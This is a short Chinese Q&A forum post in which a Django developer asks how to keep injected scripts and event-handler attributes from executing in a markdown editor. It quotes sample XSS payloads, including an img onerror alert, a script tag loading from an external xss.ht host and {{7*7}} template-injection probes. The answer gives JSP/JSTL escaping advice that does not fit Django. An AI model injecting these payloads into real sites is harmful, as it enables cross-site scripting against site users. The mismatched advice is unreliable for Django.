我想知道如何防止脚本代码和HTML属性在我的网站编辑器中停止执行?
如果有人添加带有外部代码链接的脚本标签或在HTML标签的某些属性中调用jQuery函数。
我正在使用markdown编辑器和django框架。
例如:
'>"></title></style></textarea></script><img src=x onerror=alert(document.domain)></script>
'>"></title></style></textarea></script><script/src=https://samengmg.xss.ht></script>
{{7*7}}{7*7}
答案 0 :(得分:0)
对所有输入字段使用htmlEscape =“ true”。 如果要显示值,请尝试fn:escapeXml(value)。您需要导入jstl函数taglib